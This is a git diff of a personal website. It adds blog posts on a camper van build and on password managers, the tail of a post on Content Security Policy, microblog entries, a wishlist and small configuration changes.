+Normally, including `'self'` is safe, although care should be taken if you allow +users of your site to upload content, and that content is accessible on the same +origin. If so, a user could potentially upload a malicious file and bypass the +CSP as the file is available under the `'self'` domain. + + +### Other Permissive Sources + +The following are considered permissive. I won't go into too much detail for +each, but ideally you should avoid using: + +* `https:` - Any source that is hosted on an encrypted server. A malicious actor + can very easily spin up a server with a valid certificate +* `data:` - Any source that can be loaded via a data scheme. In most cases, this + just involves base64 encoding a payload. + + diff --git a/content/blog/022-new-van.md b/content/blog/022-new-van.md new file mode 100644 index 0000000..ccea0ac --- /dev/null +++ b/content/blog/022-new-van.md @@ -0,0 +1,158 @@ +--- +title: I Got a Van +date: 2024-08-24 +tags: + - Van Build +description: > + I've bought a van. I'm planning on converting it to a camper and documenting + the process here. +--- + +So, as you've probably gathered from the title, I've bought a van. Or, at least, +reserved it, I actually pick it up in a couple of weeks. It's a 2019 Fiat Ducato +L4H2 which means it's long and quite tall. + +There will be 3 of us using the van. Me, my wife, and our lurcher, Rumple. One +of the biggest requirements we have is that the van is both comfortable and safe +for him to live and travel in. We have some ideas and thoughts around this, but +you will hopefully see what that looks like in future posts. + +My plan is to convert this van into a camper. This first post is mainly a brain +dump, for me as much as anyone else, about my current plans. Many will change, +some may be scrapped all together. + +We are not planning on living in the van. However, it would be nice if we can go +away for prolonged trips in it. Maybe a month or 6 weeks at a time. Obviously, +we will use it for shorter weekend breaks, but we don't want to be limited +to a week or so at a time. As a result, we should be able to work from the van. + +We are in a very fortunate position that my wife and I both work from home for +the vast majority of the time. As a result, as long as we have a reasonable +internet connection and electricity, we can both work. + +Obviously, if we are both working off laptops, and potentially with additional +monitors, or power consumption is likely to be on the higher end. The electrical +system in the van will definitely be a separate blog post, but at the moment, it +looks like we'll be going for [LiFePO_4_ +batteries](https://en.wikipedia.org/wiki/Lithium_iron_phosphate_battery). +Hopefully with 2 or 3 solar panels on the roof, as well as DC to DC charging so +we can charge the batteries whilst driving. We will probably also add a shore +power hookup, but that may come further down the line. + +For the internet side of things, I plan to mount a 5G antenna on the roof. +Despite the name, it should pick up all the Gs. I will be on the look out for a +router that I can plug such an antenna into, preferably one that supports the +something like OpenWRT. + +This brings me quite nicely onto my plans for the Van's network. I hate WiFi. It +will be available in the van for all my ESP boards (more on that later), but if +I'm working on my laptop, I want it plugged in with a cable. So, I will be +running Ethernet in my van, as well as power and water and whatever else I need +to make it into a camper. I won't be going overboard like I did in my house - +weight is a consideration in a van and cables are heavy; but I will be running +it to (as a minimum) the office space for me and my wife, and my van server. + +Van server? Yes, you heard (read?) that right. I'll be having a server in my +van. I am not sure yet if I'll be going down the Pi route, or something like a +Nuc, but I will be having a low-ish powered server in the van. This will run +things like [Home Assistant](https://www.home-assistant.io/) (more on that in a +bit), [PiHole](https://pi-hole.net/), +[AudioBookShelf](https://www.audiobookshelf.org/), +[WireGuard](https://www.wireguard.com/) and maybe a few other things. +Importantly, I won't be using it to run things that need a lot of power - think +Jellyfin, Ollama and such. + +Things might change. Obviously, with a server that can go on motorways, spinning +hard drives are a no-go. So storage is likely to have to be solid state for +everything. As a result, I won't really be using this for a NAS. Storage of +photos and videos will still go to my home server in my house. But things like +audiobooks and podcasts that I am likely to want to listen to on the go will be +stored on the local network. + +So, I mentioned Home Assistant. I am a big fan of **some** smart home tech. For +me to be a fan of it, it needs to run (or be made to run) locally. Being able to +turn your lights on from your phone is great, but if the switch on the wall +doesn't work without an internet connection, I'm not interested. In my house, +all of our light switches have been flashed with [ESPHome](https://esphome.io/). +This custom firmware allows the switch to be controlled via Home Assistant, but +importantly, even if my network has some catastrophic failure, the button still +works. In the van, the chances of no internet are likely to be high - even with +a fancy antenna on the roof. So, requiring the internet is an absolute no go for +me. + +That will probably mean a whole bunch of DIY devices. I should be able to quite +easily make things like lighting smart. I would also like to think that things +like water sensors for my fresh and waste water can be read by an ESP device. +What will probably take a bit more work / experimentation will be plugging an +ESP device into the vehicles CAN bus to see if I can read data from that. It +would also be great to have things like celling fans and heaters controllable +from Home Assistant. + +Talking of fans and heaters, it is probably worth me mentioning that I will be +trying to keep costs down where possible - or at least prioritising where money +is spent. I would much rather, for instance, buy a cheap [Chinese celing +fan](https://www.aliexpress.com/item/1005007224984817.html) or [diesel +heater](https://www.aliexpress.com/item/1005006359176237.html) so I can buy +decent electronics from the likes of [Victron](https://www.victronenergy.com/). + +Of course, I'll be taking things like the fans apart to see if I can stick an +ESP chip in them and control them with Home Assistant. + +With regard to cooking in the van, I'm currently undecided on the best course of +action. I would like to go fully electric, with induction hobs and an electric +oven. Obviously, this would mean I need even more batteries in the van, which +will increase the weight even more. However, I think with the amount of driving +we normally do, I should be able to keep batteries topped up from the vehicle's +alternator. It is possible that we will keep a gas camping stove somewhere so +that if we're caught out, we can still boil water and heat food. But I would +rather avoid the added hassle of gas canisters and piping if I can. + +With regard to water, I would like to mount both fresh and waste water tanks +under the van. I don't yet know how big they will be, and will probably be +determined by weight restrictions. However, my plan is to fit a low powered +immersion heater into these to prevent them freezing in the winter. I won't be +using this to make hot water, just to keep the temperature of the water above +freezing - again probably powered by an ESP chip. + +Hot water is a different story. I have seen many youtube van builders pipe their +diesel heater's pipe to a heat exchanger to heat the water. I may do this, but I +would also like to try and heat the water from the engine's coolant system. I +haven't seen this done in a camper (I'm not suggesting it hasn't been done), but +I have seen it done [on other +vehicles](https://www.youtube.com/watch?v=LKmkqenpE5o). + +One thing I'm fairly sure I don't want in the van is a full sized shower. At +least, not an internal one. Space is a premium in a van, and in my opinion, the +space a shower takes up is unnecessary. I will probably add something like the +[Bullfinch External Shower +Point](https://camperwarehouse.co.uk/product/bullfinch-external-shower-point-white/), +so we can have outdoor showers if we need them. But most of the time, I think +we'll be able to make do with a flannel and a bowl of hot water. It does mean +that the sink in the van will need to be big enough to wash our hair in. An +added bonus of the external shower system is we'll be able to wash off Rumple +before he gets in the van when he inevitably gets covered in mud. + +Only thing I haven't really touched upon is the planned layout. That will +probably be my next blog post, but I plan to keep it quite simple. Bed at the +back. Undecided yet on the orientation, and that will depend if I can sleep +width ways once we've added the insulation. If I can't, and we end up making the +bed go length ways, we will probably have an "almost" fixed bed, where the +bottom foot or so is removable and is used as a back rest or something. This +frees up some more space in the middle of the van during the day, but still +means we don't need to make our bed each evening. + +The cab area will have swivel seats. This will make our main living / working +area, and as a result, we won't have a separate "lounge". Again, space is at a +premium in a van. + +Between the cab / living area and the bed will be our kitchen and toilet areas, +as well as a spot for Rumple's bed. Importantly this will include a mounting +point for his harness so he is secured whilst driving. + +Before I finish up, it's probably important that I clarify a few things. I will +be learning as I go. I will be making mistakes and I will aim to share those +with you. However, this "build log" will not be tutorials. I am not an +electrician, so don't take electrical advice off me. Same for plumbing or +carpentry or anything else for that matter. That being said, if you spot +something I could be doing better, or an idea you think I might like, or just +want to say hi, leave a comment by emailing `comments.new-vanjn.hn`. diff --git a/content/blog/023-wallace-and-gromit-passwords.md b/content/blog/023-wallace-and-gromit-passwords.md new file mode 100644 index 0000000..fb608e7 --- /dev/null +++ b/content/blog/023-wallace-and-gromit-passwords.md @@ -0,0 +1,56 @@ +--- +title: Passwords Most Fowl +date: 2024-12-26 +tags: + - Security +description: > + If you're like me, some of yesterday (Christmas 2024) was spent watching the + new Wallace and Gromit. I wonder if like me it also got you thinking about + password managers. +--- + +**Warning:** Contains Spoilers! + +If you caught the latest episode, "Vengeance Most Fowl," you know, they were +once again up against the sneaky Feathers McGraw, who pulls off a pretty clever +hack involving a "smart gnome." The twist? The gnome’s password was super easy +to guess! While it's all in good fun, it’s a great reminder of why we should all +be using password managers. + +In the episode, Feathers McGraw’s ability to crack the gnome's password +highlights a real issue we face today: weak passwords. Let's be honest, are you +still using simple passwords like birthdays or pets' names? Or maybe your pets +name with a 1 and an exclamation mark? It’s way too easy for hackers to figure +those out, and that puts our personal info at risk. + +Now, imagine if Wallace had a password manager. If he'd used it properly, +he would've had strong, unique passwords for all his inventions and accounts. +He could have even shared the passwords with his trusty companion. + +That would've made it nearly impossible for Feathers McGraw - or anyone else for +that matter - to break into the gnomes. Or at least, not by guessing the +passwords. + +I'd also like to draw attention to everything getting "smart" in our +increasingly connected world, it seems like everything is getting a smart +upgrade - from our fridges to our light bulbs, and even garden gnomes! + +While the convenience of smart devices can be appealing, there are some serious +risks that come with connecting everything to the internet. In "Vengeance Most +Fowl," the hacked smart gnome serves as a perfect example of how these devices +can become vulnerabilities. When we connect everyday items to the internet, we +open the door for hackers to exploit them, potentially gaining access to our +personal information or even taking control of our homes. + +Whilst the gnomes in Wallace and Gromit were obviously over the top and comical, +it's become the norm for everything from cameras to lawn mowers to be connected. + +Imagine a world where your smart gnome could be used to spy on you or trigger a +series of unfortunate events, just like in the episode. The more devices we +connect, the more points of entry there are for cybercriminals. Many of these +smart devices come with default passwords or lack robust security features, +making them easy targets. It's crucial to remember that while technology can +make our lives easier, it also requires us to be vigilant about our security +practices. By being mindful of what we connect to the internet and ensuring that +we use strong passwords and security measures, we can enjoy the benefits of +smart technology without falling victim to the dangers it can bring. diff --git a/content/card.curl b/content/card.curl index 93f2411..768a8d0 100755 --- a/content/card.curl +++ b/content/card.curl @@ -44,6 +44,8 @@ ${LRED}Jonathan Hodgson${NC} ${RED}CONTACT${NC} ${ORANGE}Email: ${GREEN}jonathan@jonathanh.co.uk${NC} +${ORANGE}Matrix: ${GREEN}@jonathan:jn.hn${NC} +${ORANGE}Mastodon: ${GREEN}@archie2870@mastodon.technology${NC} ${ORANGE}Dotfiles: ${GREEN}https://jn.hn/dots/${NC} ${ORANGE}Blog: ${GREEN}https://jn.hn${NC} diff --git a/content/help-me-out.md b/content/help-me-out.md index 4e21332..f8c4d3b 100644 --- a/content/help-me-out.md +++ b/content/help-me-out.md @@ -10,11 +10,18 @@ I hate websites tracking me so I won't be tracking you if you visit my website. * Bitcoin Wallet: 132AM5imvDiWXJQGfMiGBmvnfaChaUTaQ6 * PayPal Me: +## Amazon Associates Links + +In some blog posts, I include links to products that are part of the [Amazon +Associates](https://affiliate-program.amazon.co.uk/) program. At no cost to you, +I receive a small commission based on any sales that are made using the link. I +would appreciate it if you could use these links when making purchases, although +understand fully if you choose not to. I will aim to include a non-associates +link along side the associates one. + ## Indirectly If you can't afford (or don't want) to support me, that's fine. The content I put out will always be freely available and without any form of tracking. There are some affiliate links you can use that I will get a kick back from. Be warned though, some of these services might track you - unfortunately that is out of my control. If you don't want them to, don't click the links. -* Lbry: - Lbry is a decentralised video sharing platform. By signing up with this link, they give me some of the crypto currency the platform is built around. * Digital Ocean: - Digital ocean is a hosting platform. By using this link, you will get $100 to spend (it expires after 60 days). I will also get $25 if you use it. * Smarty: - (UK Only) If you sign up for Smarty sim card, we both get a free month. -* Curve: - All your cards in one. If you sign up, we each get £5 diff --git a/content/microblog/1645562722 b/content/microblog/1645562722 new file mode 100644 index 0000000..1bd2db5 --- /dev/null +++ b/content/microblog/1645562722 @@ -0,0 +1,4 @@ +--- +title: Tue 22 Feb 2022 20:45:22 GMT +--- +I'm bad at blogging, let's see if I'm any better at micro-blogging diff --git a/content/microblog/1645886681 b/content/microblog/1645886681 new file mode 100644 index 0000000..7dd4e4a --- /dev/null +++ b/content/microblog/1645886681 @@ -0,0 +1,4 @@ +--- +title: Sat 26 Feb 2022 14:44:41 GMT +--- +Back from a super wedding of close friends. Hopefully I'll be able to keep up an almost-daily micro blog diff --git a/content/microblog/1646152089 b/content/microblog/1646152089 new file mode 100644 index 0000000..ba899a6 --- /dev/null +++ b/content/microblog/1646152089 @@ -0,0 +1,4 @@ +--- +title: Tue 1 Mar 2022 16:28:09 GMT +--- +Why can I not make my QT apps look right? *sigh* diff --git a/content/microblog/1646185440 b/content/microblog/1646185440 new file mode 100644 index 0000000..d17c924 --- /dev/null +++ b/content/microblog/1646185440 @@ -0,0 +1,4 @@ +--- +title: Wed 2 Mar 2022 01:44:00 GMT +--- +What a terrible journey. :( Home now, time for bed diff --git a/content/other-stuff-you-might-like.md b/content/other-stuff-you-might-like.md index 9349a88..8701b26 100644 --- a/content/other-stuff-you-might-like.md +++ b/content/other-stuff-you-might-like.md @@ -9,13 +9,21 @@ I consume a lot more content than I produce. If you are interested in similar st ### HexDSL -Does a lot of videos on Linux gaming (not of much interest to me) but also does -great videos on non-gaming linux content. *Side note:* He seems like a great guy -on his discord server. +Used to do a lot of videos on Linux. Those old videos still great. Now probably +falls more under general interest. + +*Side note:* He is a great guy. Got to meet him in real life and talk quite a +bit on Discord. * [Website](https://hexdsl.co.uk/) * [Youtube](https://www.youtube.com/channel/UCRE3NFNtdjR96-H4QG4U1Fg) +### Josuhua Crew + +Lots of linux-y things + +* [Website](https://www.joshuacrewe.co.uk/) + ### Brodie Robertson Videos about Linux and surrounding areas @@ -29,12 +37,34 @@ Mostly videos on Vim and some tools he uses with Vim. * [Youtube](https://www.youtube.com/channel/UCXPHFM88IlFn68OmLwtPmZA) +## Home Assistant / Smart Home + +### 3Ative + +Put ESPs in all the things. Very useful if you want to get into electronics. + +*Side note*: Seems like a great guy in Discord! + +* [Youtube](https://www.youtube.com/user/3ative) + +### Speak to the Geek + +Product reviews - focus on heating systems and energy, but covers other stuff. + +* [Youtube](https://www.youtube.com/@SpeakToTheGeekTech) + ### Self Hosted Podcast about self hosting. Talks a lot about home automation. * [Podcast](https://selfhosted.show/) +### Everything Smart Home + +Mostly product reviews and home assistant tutorials + +* [Youtube](https://www.youtube.com/@EverythingSmartHome) + ## Security ### Darknet Diaries diff --git a/content/wishlist.md b/content/wishlist.md new file mode 100644 index 0000000..6ed35e6 --- /dev/null +++ b/content/wishlist.md @@ -0,0 +1,64 @@ +--- +title: Wishlist +--- + +This is a list of things I'd like. I'll probably get around to getting some of +them at some point. If you are looking to get me something, this might be a good +place to look + +## Van + + + +## Smart Home + +### Door / window sensors (~£10 each) + +Eventually I'll want one on every window and door so duplicating these isn't a +problem. I am not fussy about the brand. As long as it's zigbee + + + + +## 3d printing + +### Filament + +Basically any reputable brand. Esun, elagoo, sovol. I mostly use PLA. Sometimes +it's sold as PLA+. Occasionally use PETG or TPU. + +Use black and navy blue most. + + + +## Coffee + + + + + + +### Arco Grinder (~£350) + + + +## Covert Companion (~$90) + + + +### Expansion Pack + + + +## Memory Sticks + +Below are examples. Get a reputable brand. I am yet to get "enough" memory +sticks. + + + + + +## Other random stuff + +Hacksmith mini saber: diff --git a/docker-compose.yml b/docker-compose.yml index 2e16d98..8d1bfe4 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -6,5 +6,16 @@ services: - "8080:80" volumes: - ./nginx:/etc/nginx/conf.d:ro - - ./public_html:/usr/share/nginx/html:ro + - ./public:/usr/share/nginx/html:ro - ./assets:/usr/share/nginx/assets:ro + + gemini: + image: adrianhesketh/gemini + volumes: + - ./public:/content:ro + - ./gem-cert:/certs:ro + environment: + - PORT=1965 + - DOMAIN=jonathanh.co.uk + ports: + - "1965:1965" diff --git a/nginx/default.conf b/nginx/default.conf index ffcc557..613449c 100644 --- a/nginx/default.conf +++ b/nginx/default.conf @@ -1,4 +1,4 @@ -include mime.types +include mime.types; types { text/markdown md;